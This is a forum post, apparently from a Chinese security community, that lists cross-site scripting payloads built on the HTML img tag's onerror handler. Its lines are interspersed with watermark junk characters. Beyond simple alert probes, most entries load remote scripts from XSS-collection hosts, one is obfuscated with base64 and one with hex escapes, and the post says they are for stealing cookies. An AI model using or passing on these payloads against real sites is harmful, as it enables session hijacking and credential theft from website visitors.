找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2063|回复: 0
打印 上一主题 下一主题

img标签的常用几种测试手段

[复制链接]
跳转到指定楼层
楼主
发表于 2015-10-18 14:33:54 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<img src='non-exist.jpg'onerror="alert('xss')">
- _4 n! _; W+ r<img src=# onerror=alert(123)>' g0 [9 @% _3 b7 B
<img src=# onerror=alert(document.cookie)>
; w- E1 I& J9 k下面是利用平台钓cookie的7 ^: @$ G: b2 z- z; d
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>! T( {, ~" ~9 P/ O

" b/ F9 G0 }% S0 v6 F9 e6 P, _) |- T7 q* Z& \9 i# }
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>6 N+ D6 R; J' ~* n8 c! y
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
7 O; Y8 l0 g; {0 `7 z“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
* c  t. O: Z( F0 ]9 p3 s, ^<img src=1 onerror=jQuery.getScript("//xss.re/974")> & b) s8 `# Q9 a% g: I; o
<img src="#">
% r+ F3 K  }* D1 R# a; m  W<img src="#">
. T# v# ]' |$ N$ y2 E6 V- f<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
& }, f& T3 [' K6 m<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
) g! e8 S8 I2 E- G7 b+ F7 m: f<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>/ J! |- B1 D8 [  z
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>7 f% I( T6 Y% _& [. w8 ^
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
- Y- t. C' m3 ?<img src=x width="0" height="0"></img>
1 [3 l+ S0 J4 ~4 k  i3 r  R0 a<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>  L; i% _- ^7 e) i
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
/ J5 P/ L% \0 ]0 N" P, r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表